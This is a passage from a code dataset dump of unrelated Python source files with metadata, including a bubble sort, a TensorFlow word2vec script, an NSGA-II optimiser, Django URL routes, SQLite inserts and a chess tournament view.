filepath)\n elif epoch % args.save_freq == 0:\n filepath = os.path.join(args.checkpoint_path, 'model{:0>3}.pth'.format(epoch))\n torch.save(state, filepath)\n\nif __name__ == '__main__':\n main()","sub_path":"classification/exp1_r50/train.py","file_name":"train.py","file_ext":"py","file_size_in_byte":14281,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"23286734","text":"\ndef BubbleSort(al):\n \n swap=True\n while swap:\n swap=False\n for i in range(len(al)-1):\n if(al[i]>al[i+1]):\n al[i],al[i+1] =al[i+1],al[i]\n swap=True \n return al\n\t\narrayList=[1,2,3,4,5,6,67,787,34,67867,786754,56]\nprint(BubbleSort(arrayList))\n\t\n\t\n\n\t\n\t\n","sub_path":"BubbleSort.py","file_name":"BubbleSort.py","file_ext":"py","file_size_in_byte":318,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"477561398","text":"import tensorflow as tf\nimport numpy as np\nimport nltk\nimport keras.preprocessing.text\nimport collections, math, os, random\n\n\n\nfile=open(\"questions-words.txt\",\"r\")\n\n\nlines=list()\nfor i,line in enumerate(file):\n lines.append(line.lower())\nlines=lines[1:] \ntrain_lines=list()\nfor line in lines:\n if line.split()[0] !=':':\n train_lines.append(line.split())\n\nwords=list()\nfor sents in train_lines:\n words.extend(sents)\n\n\ncount= collections.Counter(words).most_common() \n\n\nunique_words = [i[0] for i in count]\ndic = {w: i for i, w in enumerate(unique_words)} #dic, word -> id cats:0 dogs:1 ......\nvoc_size = len(dic)\n\n\n\n\n\ndata = [dic[word] for word in words] #count rank for every word in words\n\n\n\n\n\n\n\n\nskip_gram_pairs=list()\n\n\nskip_gram_pairs_words = list()\nfor i in range(len(train_lines)): \n for item in list(zip(train_lines[i][0:-1],train_lines[i][1:])):\n skip_gram_pairs_words.append(item )\n for item in list(zip(train_lines[i][0:-2],train_lines[i][2:])):\n skip_gram_pairs_words.append(item )\n \n \n \n k = list(ele for ele in reversed(train_lines[i]))\n for item in list(zip(k[0:-1],k[1:])):\n skip_gram_pairs_words.append(item )\n for item in list(zip(k[0:-2],k[2:])):\n skip_gram_pairs_words.append(item )\n \n \nfor i in range(len(skip_gram_pairs_words)):\n skip_gram_pairs.append(list([dic[skip_gram_pairs_words[i][0]],dic[skip_gram_pairs_words[i][1]]])) \n \n \n \nX_train=[]\nY_train=[]\n \nfor i in range(len(skip_gram_pairs)):\n Y_train.append(skip_gram_pairs[i][1])\n\nfor i in range(len(skip_gram_pairs)):\n X_train.append(skip_gram_pairs[i][0]) \nX_train=np.array(X_train)\nlist_of_batch_size=[16]\nlist_of_embedding_size=[64]\nlist_of_neg_samples=[1]\nfilelist=[\"file1.txt\",\"file2.txt\",\"file3.txt\",\"file4.txt\",\"file5.txt\",\"file6.txt\",\"file7.txt\",\"file8.txt\"]\nfor batch_size in list_of_batch_size:\n for embedding_size in list_of_embedding_size:\n for num_sampled in list_of_neg_samples:\n\n \n X= tf.placeholder(tf.int32,shape=[None]) #inputs\n Y= tf.placeholder(tf.int32,shape=[None,1]) #labels\n \n \n \n embeddings = tf.Variable(tf.random_normal([voc_size,embedding_size],-1.0,1.0))\n embed = tf.nn.embedding_lookup(embeddings, X) # lookup table\n \n \n nce_weights = tf.Variable(tf.random_normal([voc_size, embedding_size], stddev=1.0 / math.sqrt(embedding_size)))\n nce_biases = tf.Variable(tf.zeros([voc_size]))\n sess = tf.Session()\n init = tf.global_variables_initializer()\n sess.run(init)\n \n loss = tf.reduce_mean(tf.nn.nce_loss(weights=nce_weights,biases=nce_biases,labels=Y,inputs=embed,num_sampled=num_sampled,num_classes=voc_size))\n\n \n optimizer = tf.train.GradientDescentOptimizer(1.0).minimize(loss)\n n_iters = int(np.ceil(len(X_train)/batch_size))\n print(n_iters)\n Y_train = np.array(Y_train)\n \n epochs=151\n for cnt in range(epochs):\n index= 0\n for i in range(n_iters):\n sess.run(optimizer, feed_dict={X: X_train[index:index+batch_size], Y: np.expand_dims(Y_train[index:index+batch_size],axis=1)})\n index = index + batch_size\n if cnt % 10 == 0:\n print('loss is : ', sess.run(loss, feed_dict={X: X_train[0:batch_size], Y: np.expand_dims(Y_train[0:batch_size],axis=1)}))\n \n print('epoch %d done'%cnt) \n \n \n trained_embeddings = np.array(sess.run(embeddings))\n \n \n \n \n em_val=trained_embeddings.tolist()\n for i,item in enumerate(em_val):\n item.insert(0,unique_words[i])\n \n FF=[\" \".join(map(str,item)) for item in em_val] \n \n file=open(batch_size.__str__()+\"_\"+num_sampled.__str__()+\"_\"+embedding_size.__str__()+\"task2\"\".txt\",\"w\")\n\n \n for item in FF:\n file.write(\"%s\\n\" % item)\n file.close()\n \n \ndef euclidean_dist(vec1, vec2):\n return np.sqrt(np.sum((vec1-vec2)**2))\n\ndef find_closest(word_index, vectors):\n min_dist = 10000 # to act like positive infinity\n min_index = -1\n query_vector = vectors[word_index]\n for index, vector in enumerate(vectors):\n if euclidean_dist(vector, query_vector) < min_dist and not np.array_equal(vector, query_vector):\n min_dist = euclidean_dist(vector, query_vector)\n min_index = index\n return min_index\ninv_dic = {v:k for k, v in dic.items()}\ndef similar(text):\n i=dic[text];\n j=find_closest(i, trained_embeddings)\n print(inv_dic[j]) \n\n \n \ndef sortFirst(val): \n return val[0] \n \ndef nearest_k(word1,k):\n s=list()\n i=dic[word1]\n# j=dic[word2]\n# l=dic[word3]\n query_vector=trained_embeddings[i]\n for item in unique_words:\n vec=trained_embeddings[dic[item]]\n s.append([euclidean_dist(query_vector,vec),dic[item]])\n sorted_list=sorted(s,key = sortFirst)\n print(\"top-%d closest words\\n\"%k)\n \n for i in range(k):\n a=inv_dic[sorted_list[i][1]]\n print(a) \n \n","sub_path":"wor2vec.py","file_name":"wor2vec.py","file_ext":"py","file_size_in_byte":5427,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"458507721","text":"#!/usr/bin/env python3\n# MIT License\n#\n# Copyright (c) 2020 FABRIC Testbed\n#\n# Permission is hereby granted, free of charge, to any person obtaining a copy\n# of this software and associated documentation files (the \"Software\"), to deal\n# in the Software without restriction, including without limitation the rights\n# to use, copy, modify, merge, publish, distribute, sublicense, and/or sell\n# copies of the Software, and to permit persons to whom the Software is\n# furnished to do so, subject to the following conditions:\n#\n# The above copyright notice and this permission notice shall be included in all\n# copies or substantial portions of the Software.\n#\n# THE SOFTWARE IS PROVIDED \"AS IS\", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR\n# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,\n# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE\n# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER\n# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,\n# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE\n# SOFTWARE.\n#\n#\n# Author: Komal Thareja (kthare10@renci.org)\n\"\"\"\nImplements Avro representation of an Auth Token\n\"\"\"\nfrom fabric_mb.message_bus.message_bus_exception import MessageBusException\n\n\nclass AuthAvro:\n \"\"\"\n Implements Avro representation of an Auth Token\n \"\"\"\n # Use __slots__ to explicitly declare all data members.\n __slots__ = [\"name\", \"guid\", \"id_token\"]\n\n def __init__(self):\n self.name = None\n self.guid = None\n self.id_token = None\n\n def from_dict(self, value: dict):\n \"\"\"\n The Avro Python library does not support code generation.\n For this reason we must provide conversion from dict to our class for de-serialization\n :param value: incoming message dictionary\n \"\"\"\n self.name = value['name']\n if 'guid' in value and value['guid'] != \"null\":\n self.guid = value['guid']\n if 'id_token' in value and value['id_token'] != \"null\":\n self.id_token = value['id_token']\n\n def to_dict(self) -> dict:\n \"\"\"\n The Avro Python library does not support code generation.\n For this reason we must provide a dict representation of our class for serialization.\n :return dict representing the class\n \"\"\"\n if not self.validate():\n raise MessageBusException(\"Invalid arguments\")\n\n result = {\n \"name\": self.name\n }\n if self.guid is not None:\n result['guid'] = self.guid\n\n if self.id_token is not None:\n result['id_token'] = self.id_token\n return result\n\n def __str__(self):\n return \"name: {} guid: {} id_token: {}\".format(self.name, self.guid, self.id_token)\n\n def __eq__(self, other):\n if not isinstance(other, AuthAvro):\n return False\n return self.name == other.name and self.guid == other.guid and self.id_token == other.id_token\n\n def validate(self) -> bool:\n \"\"\"\n Check if the object is valid and contains all mandatory fields\n :return True on success; False on failure\n \"\"\"\n if self.name is None:\n return False\n return True\n","sub_path":"fabric_mb/message_bus/messages/auth_avro.py","file_name":"auth_avro.py","file_ext":"py","file_size_in_byte":3283,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"373424973","text":"\"\"\"\nCopyright [2020] [Carolina Oviedo]\n\nLicensed under the Apache License, Version 2.0 (the \"License\"); you may not use this file except in compliance with the License. You may obtain a copy of the License at\n\n http://www.apache.org/licenses/LICENSE-2.0\nUnless required by applicable law or agreed to in writing, software distributed under the License is distributed on an \"AS IS\" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the License for the specific language governing permissions and limitations under the License.\n\"\"\" \n\nfrom django.urls import path \nfrom . import views\n\n\nurlpatterns =[\n path('', views.index, name='index'),\n path('edit//', views.edit, name='edit'),\n path('delete//', views.deletetask, name='delete'),\n path('complete//', views.completetask, name='complete'),\n \n]","sub_path":"cockroach_todolist/listapp/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":900,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"206684350","text":"\r\n\r\nfrom _collections import deque\r\n# 도시개수, 도로개수, 거리정보, 출발 도시 번호\r\nn,m,k,x = map(int,input().split())\r\n\r\ngraph = [[] for _ in range(n+1)]\r\n\r\nfor _ in range(m):\r\n a,b = map(int,input().split())\r\n graph[a].append(b)\r\nprint(graph)\r\n\r\nvisit = [-1] * (n+1)\r\nvisit[x] = 0\r\nans = []\r\n\r\n\r\nqueue = deque([x])\r\n\r\nwhile queue:\r\n pick = queue.popleft()\r\n\r\n for i in graph[pick]:\r\n if visit[i]==-1:\r\n queue.append(i)\r\n visit[i] = visit[pick] + 1\r\n\r\nre = False\r\nfor i in range(len(visit)):\r\n if k == visit[i]:\r\n print(i)\r\n re = True\r\nif re == False:\r\n print(-1)","sub_path":"문제/DFS BFS/direction_citys.py","file_name":"direction_citys.py","file_ext":"py","file_size_in_byte":643,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"323625938","text":"import os\nimport sys\nimport getopt\nimport re\n\n\ndef parseCorpus(inputFile,outputPrefix):\n\tfilehd = open(inputFile, \"r\")\n\tlines = filehd.readlines()\n\tfilehd.close()\n\n\tcnt = 0;\n\toutFile = outputPrefix + \"_\" + \"%04d\" % cnt + \".txt\"\n\touthd = open(outFile, \"w\")\n\tfor line in lines:\n\t\tif not re.search(\"PoemHunter\",line):\n\t\t\touthd.write(line)\n\t\telse:\n\t\t\touthd.close()\n\t\t\tcnt = cnt + 1\n\t\t\toutFile = outputPrefix + \"_\" + \"%04d\" % cnt + \".txt\"\n\t\t\touthd = open(outFile, \"w\")\n\ndef parseCorpusOnNewLines(inputFile,outputPrefix):\n\tfilehd = open(inputFile, \"r\")\n\tlines = filehd.readlines() #note, read whole file into string lines\n\tfilehd.close()\n\tcnt = 0;\n\t\n\thaveOpenedFile = False;\n\tfor line in lines:\n\t\tif not re.match(r'^\\n',line):\n\t\t\tif not haveOpenedFile:\n\t\t\t\toutFile = outputPrefix + \"_\" + \"%04d\" % cnt + \".txt\"\n\t\t\t\touthd = open(outFile, \"w\")\n\t\t\t\thaveOpenedFile = True;\n\t\t\t\tcnt = cnt + 1\n\t\t\touthd.write(line)\n\t\telse:\n\t\t\touthd.close()\n\t\t\thaveOpenedFile = False;\n\t\t\t\n\ndef printUsage():\n\tprint()\n\tprint(\"Usage: \" + sys.argv[0] + \" -i -o -N (split on newlines)\")\n\tprint()\n\tsys.exit()\n\n\ndef main():\n\tinputFile = \"\"\n\toutputPrefix = \"\"\n\tsplitOnNewLines = False\n\n\tif(len(sys.argv) == 1):\n\t\tprintUsage()\n\telse:\n\t\ttry:\n\t\t\topts, args = getopt.getopt(sys.argv[1:], 'Ni:o:')\n\t\t\tfor o, a in opts:\n\t\t\t\tif o == '-i':\n\t\t\t\t\tinputFile = a\n\t\t\t\tif o == '-o':\n\t\t\t\t\toutputPrefix = a\n\t\t\t\tif o == '-N':\n\t\t\t\t\tsplitOnNewLines = True\n\n\t\t\tif(splitOnNewLines):\n\t\t\t\tparseCorpusOnNewLines(inputFile,outputPrefix)\n\t\t\telse:\n\t\t\t\tparseCorpus(inputFile,outputPrefix)\n\n\t\texcept getopt.GetoptError as err:\n\t\t\tprint(err) \n\t\t\t\t\nif __name__ == '__main__':\n\tmain()","sub_path":"02032021/parseCorpusText.py","file_name":"parseCorpusText.py","file_ext":"py","file_size_in_byte":1648,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"113225929","text":"from deap import creator, base, tools, algorithms\nimport numpy as np\nimport random\nimport math\nimport time\nfrom scipy.stats import bernoulli\nfrom objective_function.data_availability import data_storage_availability\nfrom objective_function.data_storage_time import data_storage_time\nfrom objective_function.data_storage_cost import data_storage_cost\nfrom parameters.parameters import m, n, csp_number\nfrom normalization.normalization import normalization\nfrom entropy.entropy import entropy_calculation\n\nstart = time.time()\n\n# -------------- NSGA-II 算法实现-----------\n# 问题定义\ncreator.create('MultiObjMin', base.Fitness, weights=(-1.0, -1.0, -1.0))\ncreator.create('Individual', list, fitness=creator.MultiObjMin)\n\ntoolbox = base.Toolbox()\ntoolbox.register('binary', bernoulli.rvs, 0.7)\ntoolbox.register('individual', tools.initRepeat, creator.Individual, toolbox.binary, n=csp_number)\ntoolbox.register('population', tools.initRepeat, list, toolbox.individual)\n\n\n# 评价函数\ndef objective_function(ind):\n # print(\"availability is: \", data_storage_availability(ind))\n return -math.log(data_storage_availability(ind), 1.5), data_storage_time(ind), data_storage_cost(ind)\n\n\ndef feasible(ind):\n count = 0\n for i in range(0, len(ind)):\n if ind[i] == 1:\n count += 1\n if count == (m + n):\n return True\n return False\n\n\ntoolbox.register('evaluate', objective_function)\ntoolbox.decorate('evaluate', tools.DeltaPenalty(feasible, (1000, 1000, 1000)))\n\n# 注册工具\ntoolbox.register('selectGen1', tools.selTournament, tournsize=2)\ntoolbox.register('select', tools.emo.selNSGA2)\ntoolbox.register('mate', tools.cxUniform, indpb=0.9)\ntoolbox.register('mutate', tools.mutShuffleIndexes, indpb=0.05)\n\n# 遗传算法主程序\n# 参数设置\ntoolbox.popSize = 100\ntoolbox.maxGen = 200\ntoolbox.cxProb = 0.7\ntoolbox.mutateProb = 0.2\n\n\nstart = time.time()\n\npop = toolbox.population(toolbox.popSize)\n# print(\"Population is: \", pop)\n# print(type(pop))\n# 迭代部分\n# 第一代\n\nfitnesses = toolbox.map(toolbox.evaluate, pop)\nfor ind, fit in zip(pop, fitnesses):\n ind.fitness.values = fit\nfronts = tools.emo.sortNondominated(pop, k=toolbox.popSize)\n# 将每个个体的适应度设置为pareto前沿的次序\nfor idx, front in enumerate(fronts):\n for ind in front:\n ind.fitness.values = (idx+1),\n# 创建子代\noffspring = toolbox.selectGen1(pop, toolbox.popSize) # binary Tournament选择\noffspring = algorithms.varAnd(offspring, toolbox, toolbox.cxProb, toolbox.mutateProb)\n\n# 第二代之后的迭代\nfor gen in range(1, toolbox.maxGen):\n print(\"This is the \", gen, \" 's generation....\")\n combinedPop = pop + offspring # 合并父代与子代\n # 评价族群\n fitnesses = toolbox.map(toolbox.evaluate, combinedPop)\n data_availability = []\n data_time = []\n data_cost = []\n # print(\"Fienesses are: \", list(fitnesses))\n for ind, fit in zip(combinedPop, fitnesses):\n ind.fitness.values = fit\n # print(\"Fitness value is: \", ind.fitness.values)\n # print(ind.fitness.values[0])\n data_availability.append(fit[0])\n data_time.append(fit[1])\n data_cost.append(fit[2])\n\n data_availability = normalization(data_availability)\n data_cost = normalization(data_cost)\n data_time = normalization(data_time)\n\n distance = []\n for i in range(0, len(data_availability)):\n distance.append(np.sqrt(data_availability[i] ** 2 + data_cost[i] ** 2 + data_time[i] ** 2))\n\n distance.sort()\n # print(distance[0])\n\n # 快速非支配排序\n fronts = tools.emo.sortNondominated(combinedPop, k=toolbox.popSize, first_front_only=False)\n # 拥挤距离计算\n for front in fronts:\n tools.emo.assignCrowdingDist(front)\n # 环境选择 -- 精英保留\n pop = []\n for front in fronts:\n pop += front\n pop = toolbox.clone(pop)\n pop = tools.selNSGA2(pop, k=toolbox.popSize, nd='standard')\n\n # 创建子代\n offspring = toolbox.select(pop, toolbox.popSize)\n offspring = toolbox.clone(offspring)\n offspring = algorithms.varAnd(offspring, toolbox, toolbox.cxProb, toolbox.mutateProb)\n\n# print(\"Time cost is: \", end - start)\n\nprint(len(offspring))\nfront = tools.emo.sortNondominated(offspring, len(offspring))[0]\n# print(type(front))\n\n# fronts = []\n#\n# for i in range(0, len(front)):\n# fronts.append(front[i][0])\n\n# print(\"fronts are: \", offspring)\n## 去除不合理\n\n\ndef calculate_1(front):\n count = 0\n for i in range(len(front)):\n if front[i] == 1:\n count += 1\n return count\n\nfront_after = []\n\nfor i in range(len(front)):\n if calculate_1(front[i]) == 7:\n front_after.append(front[i])\n\n# print(front_after)\n\n# 构建一个矩阵\nresult = []\nfor i in range(len(front_after)):\n tmp = [objective_function(front_after[i])[0], objective_function(front_after[i])[1], objective_function(front_after[i])[2]]\n result.append(tmp)\n\n# for i in range(len(front)):\n# tmp = [objective_function(front[i])[0], objective_function(front[i])[1], objective_function(front[i])[2]]\n# result.append(tmp)\n\n\nqos_set = entropy_calculation(result)\nindex_optimal = qos_set.index(max(qos_set))\n# print(index_optimal)\nprint(\"The best qos is: \", qos_set[index_optimal])\n\nprint(front[index_optimal])\n\n# print(\"Front is: \", front)\nend = time.time()\nprint(\"Time cost is: \", end - start)","sub_path":"graduation/2018级/hudengcheng/code/code/storage_allocation_code/NSGA2/NSGA2.py","file_name":"NSGA2.py","file_ext":"py","file_size_in_byte":5363,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"518241992","text":"#!/usr/bin/env python3\nimport sqlite3\n#some initial data\nzone = 'kitchen';\ntemperature = 13.3;\ndate = '2020-10-01';\ntime = '20:50:50';\n#connect to database file\ndbconnect = sqlite3.connect(\"mydatabase.db\");\n#If we want to access columns by name we need to set\n#row_factory to sqlite3.Row class\ndbconnect.row_factory = sqlite3.Row;\n#now we create a cursor to work with db\ncursor = dbconnect.cursor();\nfor i in range(10):\n #execute insert statement\n if i == 1 or 4 or 7 or 10:\n zone = 'kitchen';\n elif i == 2 or 5 or 8:\n zone = 'greenhouse';\n else:\n zone = 'garage';\n temperature += 1.1;\n cursor.execute('''insert into temps values (?, ?, ?, ?)''',\n (date, time, zone, temperature));\ndbconnect.commit();\n#create new table\ncursor.execute('CREATE TABLE ages(name TEXT, dateofbirth DATE, age NUMERIC)');\n#fill new table with data\ncursor.execute('''insert into ages values ('Cris', '2013-10-05', 6)''')\ncursor.execute('''insert into ages values ('Bob', '1993-11-23', 26)''')\ncursor.execute('''insert into ages values ('Dean', '2006-03-14', 14)''')\ncursor.execute('''insert into ages values ('Nico', '2012-04-12', 8)''')\ndbconnect.commit();\n\n#execute simple select statement\ncursor.execute('SELECT * FROM temps');\n#print data\nfor row in cursor:\n print(row['tdate'],row['ttime'],row['zone'],row['temperature'] );\n#execute simple select statement\ncursor.execute('SELECT * FROM ages');\n#print data\nfor row in cursor:\n print(row['name'],row['dateofbirth'],row['age'] );\n#close the connection\ndbconnect.close();\n","sub_path":"Lab_3/pydb.py","file_name":"pydb.py","file_ext":"py","file_size_in_byte":1548,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"32508970","text":"#\n\nfrom framework.BasicModel import BasicModel\nfrom framework.ConvBlocks import LinearBlock\nimport torch.nn as nn\nimport torch\n\n\nclass FCClassifier(BasicModel):\n def __init__(self):\n super().__init__()\n\n self.m_layers = nn.Sequential(\n nn.LayerNorm(192, elementwise_affine=False),\n #nn.BatchNorm1d(192, affine=False),\n LinearBlock(192, 120, normModule=nn.LayerNorm(120, elementwise_affine=False)),\n nn.Dropout(p=0.5),\n LinearBlock(120, 70, normModule=nn.LayerNorm(70, elementwise_affine=False)),\n nn.Dropout(p=0.5),\n LinearBlock(70, 40, normModule=nn.LayerNorm(40, elementwise_affine=False)),\n nn.Dropout(p=0.5),\n LinearBlock(40, 1, useNonLinearActivation=False) # output logits, which needs sigmoid inside the loss function.\n )\n\n\n def forward(self, x, gts=None):\n device = x.device\n x = self.m_layers(x)\n\n if gts is None:\n return x # output logits\n else:\n # compute loss (put loss here is to save main GPU memory)\n loss = torch.tensor(0.0).to(device)\n for lossFunc, weight in zip(self.m_lossFuncList, self.m_lossWeightList):\n if weight == 0:\n continue\n lossFunc.to(device)\n gts = gts.view_as(x)\n loss += lossFunc(x, gts) * weight\n\n return x, loss\n\n","sub_path":"ResponsePrediction/FCClassifier.py","file_name":"FCClassifier.py","file_ext":"py","file_size_in_byte":1439,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"41218749","text":"''' Exercise 3\n\tConditions\n'''\nimport datetime\n\nNAME = \"Jesper\"\nAGE = 34\nCURTIME = datetime.datetime.now()\nNOW_YEAR = CURTIME.year\n\nfor i in range(-12, 12, 3):\n tense = \"will be\"\n if i < 0:\n tense = \"was\"\n elif i == 0:\n tense = \"is\"\n print(\"In %d, %s %s %d years old.\" % (NOW_YEAR+i, NAME, tense, AGE+i))\n if (AGE+i) % 10 == 0:\n print(\"\\tRound birthday.\")\n","sub_path":"python-intro-3/e03d-if-conditions-date-year.py","file_name":"e03d-if-conditions-date-year.py","file_ext":"py","file_size_in_byte":392,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"653834201","text":"import cv2\nfrom tkinter import *\nfrom PIL import ImageTk, Image\nfrom time import sleep\nfrom time import gmtime, strftime\nimport os\n\nclass Microwave(object):\n def __init__(self):\n # Camera------------------------------------ \n self.cam = cv2.VideoCapture(0)\n if not(self.cam.isOpened()):\n print('Error opening camera')\n \n self.capture_delay = 0.5 # seconds\n self.capture_delay_ms = int(self.capture_delay*1000)\n \n no_errors, img = self.cam.read()\n if type(img) == None:\n print(\"Image NoneType\")\n return (False, self.no_img)\n if no_errors:\n self.rotated_img = self.rotate_img(img, 180)\n \n # GUI----------------------------------------\n self.root = Tk() \n self.btnRun_lbl = \"Run\"\n self.btnStop_lbl = \"Stop\"\n self.btnFacingDoor_lbl = \"Facing Door\"\n \n no_img = cv2.imread(\"no_img.jpg\", 0)\n no_img = Image.fromarray(no_img)\n self.no_img = ImageTk.PhotoImage(no_img)\n \n # Functionality------------------------------\n self.flg_run = False\n self.flg_handle = False\n self.img_path = \"Images/\"\n \n self.img_index = self.get_img_index()\n \n def get_img_index(self):\n subdirs = os.listdir(self.img_path)\n classes = [each for each in subdirs if os.path.isdir(self.img_path + each)]\n return max([int(f[:-4]) for c in classes for f in next(os.walk(self.img_path + c))[2] if f.endswith(\".jpg\")]) + 1\n \n def facing_door(self, event):\n self.flg_handle = True\n print(\"Facing Door\")\n \n def not_facing_door(self, event):\n self.flg_handle = False\n print(\"Not Facing Door\")\n \n def launch(self):\n btnRun = Button(self.root, text=self.btnRun_lbl, command=self.btn_run_press)\n btnRun.grid(row=2, column=0, sticky=N+S+E+W)\n\n btnStop = Button(self.root, text=self.btnStop_lbl, command=self.run_stop)\n btnStop.grid(row=2, column=1, sticky=N+S+E+W)\n\n btnFacingDoor = Button(self.root, text=self.btnFacingDoor_lbl)\n btnFacingDoor.grid(row=2, column=2, sticky=N+S+E+W)\n btnFacingDoor.bind('', self.facing_door)\n btnFacingDoor.bind('', self.not_facing_door)\n \n self.display_img = Label(image=self.no_img)\n self.display_img.grid(row=0, columnspan=3)\n\n self.root.mainloop()\n \n def rotate_img(self, img, angle):\n rows, cols, _ = img.shape\n M = cv2.getRotationMatrix2D((cols/2,rows/2),angle,1)\n return cv2.warpAffine(img, M, (cols,rows))\n \n def btn_run_press(self):\n self.run_start()\n \n def run_start(self):\n print(\"Run Start\")\n self.flg_run = True\n \n # Instantiate Callback Timer\n self.root.after(self.capture_delay_ms, self.update_img)\n \n def run_stop(self):\n print(\"Run Stop\")\n self.flg_run = False\n \n def cam_capture(self):\n no_errors, img = self.cam.read()\n if type(img) == None:\n print(\"Image NoneType\")\n return (False, self.no_img)\n if no_errors:\n self.rotated_img = self.rotate_img(img, 180)\n camera = cv2.cvtColor(self.rotated_img, cv2.COLOR_BGR2RGB)\n camera = Image.fromarray(camera)\n camera = ImageTk.PhotoImage(camera)\n return (True, camera)\n else:\n print(\"Image Errors\")\n return (False, self.no_img)\n \n def update_img(self):\n if self.flg_run == False:\n return\n \n success, camera = self.cam_capture()\n self.display_img.configure(image=camera)\n self.display_img.image = camera\n if success:\n print(\"Success\")\n filename = str(self.img_index) +\".jpg\"\n path = self.img_path + str(self.flg_handle) + \"/\" + filename\n cv2.imwrite(path, self.rotated_img)\n self.img_index += 1\n \n # Re-Instantiate Callback Timer\n self.root.after(self.capture_delay_ms, self.update_img)\n\nm = Microwave()\nm.launch()","sub_path":"Collect_Data.py","file_name":"Collect_Data.py","file_ext":"py","file_size_in_byte":4205,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"255440613","text":"import requests\nimport os\nfrom utils.env_utils import *\nAPI_URL = read_env('API_URL')\ndef createCard(cards):\n for c in cards:\n my_card = c.get_card()\n obj = {}\n if 'tags' in my_card:\n obj = {'texto':f'{my_card[\"texto\"]}','tags':my_card[\"tags\"]}\n print(obj)\n else:\n obj = {'texto':f'{my_card[\"texto\"]}'}\n print(obj)\n r = requests.post(f\"{API_URL}/cards\",json=obj)\n if r.status_code != 201:\n print(\"Ocorreu um erro ao inserir um card\")\n return False","sub_path":"utils/request_utils.py","file_name":"request_utils.py","file_ext":"py","file_size_in_byte":558,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"147350267","text":"\n\"\"\"\nObject view\n\"\"\"\nfrom chess.views.listplayers import ListPlayers\nfrom chess.models.tournaments import Tournament\n\nclass CreateTournament:\n\n \"\"\"\n Cette méthode permet de x\n \"\"\"\n def __init__(self, data):\n self.data = data\n\n def tournament_properties(self):\n tournament = {}\n for tournament_prop in Tournament.prop_tournaments():\n value = input('Entrez les informations suivantes: {}\\n'.format(tournament_prop))\n tournament[tournament_prop] = value\n listplayers = []\n while len(listplayers)!=4:\n print(\"Liste des joueurs parmi ceux proposés :\")\n listplayers_view = ListPlayers(self.data)\n choice = listplayers_view.select_player()\n listplayers.append(choice)\n tournament[\"listplayers\"]= listplayers\n return tournament\n\n\n\n def home(self, code_return):\n tournament = {}\n if code_return in (1,2):\n if code_return == 2:\n print(\"Bienvenue dans la page de création de tournois\") \n else:\n print(\"Un tournois du même nom existe déjà, entrez un autre nom\")\n tournament = self.tournament_properties()\n else:\n print(\"Tournois bien ajouté\")\n return tournament\n","sub_path":"chess/views/createtournament.py","file_name":"createtournament.py","file_ext":"py","file_size_in_byte":1295,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"199261623","text":"# Exercise 5.4: Notebook: Read and write to the notebook\n\n\"\"\"\nThe last exercise in this chapter is the first part of the second multi-part\nassignment of this course, the notebook. In this notebook the user is able to\nadd, read and delete notes from a separate note file \"notebook.txt\".\n\nCreate a program which allows the user to\n(1) Read the contents of the notebook\n(2) Add notes to the file or\n(3) Delete all of the notes.\n\nIf the user selects 1, the entire notebook file is printed to the screen, if 2\nthen the program prompts \"Write a new note: \", and adds the written note as the\nlast line into the file with a trailing line break \"\\n\". If the player selects\n3, the file is emptied and the message \"Notes deleted\" will be shown. Also add\nthe option (4) Quit, which ends the program, printing \"Notebook shutting down,\nthank you.\". With other selections the program prompts \"Incorrect selection\".\nWhen working, the program prints following:\n\"\"\"\n\nwhile True:\n print(\"(1) Read the notebook \\n(2) Add note \\n(3) Empty the notebook \\n(4) Quit\\n\")\n select = int(input(\"Please select one: \"))\n\n if select == 1:\n src = open('notebook.txt', 'r')\n content = src.read()\n print(content)\n src.close()\n elif select == 2:\n src = open('notebook.txt', 'a+')\n note = input(\"Write a new note: \")\n src.write(note+\"\\n\")\n elif select == 3:\n src = open('notebook.txt', 'w').close()\n print(\"Notes deleted.\")\n elif select == 4:\n print(\"Notebook shutting down, thank you.\")\n break\n else:\n print(\"Wrong selection entered!\")\n","sub_path":"Viope/Ex-5/ex5_4.py","file_name":"ex5_4.py","file_ext":"py","file_size_in_byte":1606,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"641833461","text":"from django.shortcuts import render, redirect\nfrom django.http import HttpResponse\nfrom polls.models import Image\nfrom urllib.parse import urlparse, parse_qs\nfrom pprint import pprint\nimport os\nfrom .questions import *\nfrom .image import *\n\ncur_image = 0\n# all lower, accepted image extensions list\naccepted_image_extensions = ['.jpg', '.jpeg', '.png']\nfolder_name = 'car-images'\nimages_path = os.path.join(os.getcwd(), folder_name)\n\ndef construct_image_list():\n file_list = 